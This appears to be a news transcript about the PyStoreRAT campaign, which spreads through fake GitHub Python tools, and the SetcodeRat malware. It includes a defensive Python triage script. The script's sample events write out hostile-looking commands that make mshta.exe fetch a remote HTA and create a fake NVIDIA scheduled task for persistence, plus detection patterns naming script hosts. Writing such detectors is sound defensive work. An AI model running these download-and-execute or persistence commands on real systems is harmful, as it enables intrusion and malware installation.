Cybersecurity Threats Emerge from GitHub Malware Campaign
Full Transcript
Cybersecurity researchers highlight a new campaign exploiting GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan, or RAT, named PyStoreRAT. According to researcher Yonatan Edri from Morphisec, these repositories, masquerading as development utilities or OSINT tools, contain minimal code designed to download and execute a remote HTA file using mshta.exe.
PyStoreRAT is described as a modular, multi-stage implant capable of executing various payloads including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer called Rhadamanthys.
The campaign has been active since mid-June 2025, with repositories promoted through social media like YouTube and X. The threat actors utilize either newly created or dormant GitHub accounts to publish the repositories, embedding malicious payloads in maintenance commits as the tools gained popularity.
Many of these tools, however, do not function as advertised, often only displaying static interfaces. The malicious loader stub is responsible for triggering the infection chain, which executes a remote HTA payload delivering the PyStoreRAT malware.
This malware can profile systems, check for administrator privileges, and scan for cryptocurrency wallet files linked to Ledger Live, Trezor, and others. The loader stub also gathers information on installed antivirus products to elude detection.
If any antivirus products are found, it executes mshta.exe through cmd.exe; otherwise it runs mshta.exe directly. Persistence is achieved by creating a scheduled task disguised as an NVIDIA app self-update. The malware can execute various commands, download and execute payloads, and spread via removable drives.
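The two host-side behaviours just described (mshta.exe pulling a remote HTA, launched directly or through cmd.exe from a Python loader, and a scheduled task named like an NVIDIA updater whose action is actually a script host) are what a defender would hunt for in process-creation telemetry. The script below is an added example, not code from Morphisec or from the report; it runs a small triage over constructed Sysmon-style events. The hostnames, task names and paths in the sample events are placeholders invented here, not indicators from the campaign.

```python
"""Triage process-creation events for the PyStoreRAT-style behaviours described above.

Added example; the events below are constructed, not real telemetry or IoCs.
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str
    cmdline: str
    parent_image: str


REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Script hosts that a legitimate vendor updater task would not normally invoke.
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "rundll32.exe")
# Parents seen in the loader chain: the Python stub, or cmd.exe when the stub detours through it.
LOADER_PARENTS = {"python.exe", "pythonw.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of forward slashes and quotes."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].strip('"').lower()


def check_mshta(ev: ProcEvent) -> list[str]:
    """Flag mshta.exe executing a remote HTA; note when the parent matches the loader pattern."""
    reasons: list[str] = []
    if basename(ev.image) == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        reasons.append("mshta.exe fetching a remote HTA")
        parent = basename(ev.parent_image)
        if parent in LOADER_PARENTS:
            reasons.append(f"parent is {parent} (script-loader pattern)")
    return reasons


def parse_schtasks(cmdline: str) -> dict[str, str]:
    """Return the /tn (task name) and /tr (task action) values of a schtasks command line.

    posix=False keeps Windows backslashes literal and quoted arguments intact.
    """
    tokens = shlex.split(cmdline, posix=False)
    out: dict[str, str] = {}
    for i, tok in enumerate(tokens[:-1]):
        key = tok.lower()
        if key in ("/tn", "/tr"):
            out[key] = tokens[i + 1].strip('"')
    return out


def check_schtask(ev: ProcEvent) -> list[str]:
    """Flag a task that is named like an NVIDIA updater but runs a script host or a remote URL."""
    if basename(ev.image) != "schtasks.exe" or "/create" not in ev.cmdline.lower():
        return []
    args = parse_schtasks(ev.cmdline)
    name, action = args.get("/tn", ""), args.get("/tr", "")
    if "nvidia" not in name.lower():
        return []
    reasons: list[str] = []
    host = next((h for h in SCRIPT_HOSTS if h in action.lower()), None)
    if host:
        reasons.append(f"task '{name}' runs script host {host}")
    if REMOTE_URL.search(action):
        reasons.append(f"task '{name}' action references a remote URL")
    return reasons


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> reasons for every event that trips either check."""
    hits: dict[int, list[str]] = {}
    for idx, ev in enumerate(events):
        reasons = check_mshta(ev) + check_schtask(ev)
        if reasons:
            hits[idx] = reasons
    return hits


# Constructed sample events (placeholder hosts and names, not indicators from the report).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://placeholder.invalid/update.hta",
              r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe https://placeholder.invalid/update.hta",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "NVIDIA App SelfUpdate" /tr "mshta.exe http://placeholder.invalid/u.hta" /sc minute /mo 30',
              r"C:\Windows\System32\cmd.exe"),
    # Benign look-alike: a real vendor binary under Program Files, no script host, no URL.
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "NVIDIA App SelfUpdate" /tr "C:\Program Files\NVIDIA Corporation\NVIDIA app\NVIDIA app.exe" /sc daily',
              r"C:\Program Files\NVIDIA Corporation\NVIDIA app\NVIDIA app.exe"),
    # Benign: mshta.exe opening a local file from Explorer.
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\dev\Desktop\local_page.hta",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

Only events 0, 1 and 2 are flagged: the legitimate-looking NVIDIA task passes because its action is a vendor executable rather than a script host or URL, and the local-HTA launch passes because nothing is fetched remotely. The checks are triage heuristics keyed on the behaviours the transcript describes; the campaign's actual task name, HTA URL and loader paths are not given on the page, so a production rule would need those from the Morphisec report.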
Morphisec indicates that the operation likely involves a threat actor of Eastern European origin due to Russian-language artifacts. The report concludes that PyStoreRAT signifies a shift toward adaptable, script-based implants that evade traditional detection methods.
In related news, QiAnXin has reported another RAT called SetcodeRat, propagating in China since October 2025 through malicious installers for popular software, verifying the victim's region before executing its payload.
The malware connects to Telegram or a conventional C2 server for instructions and performs various data theft activities.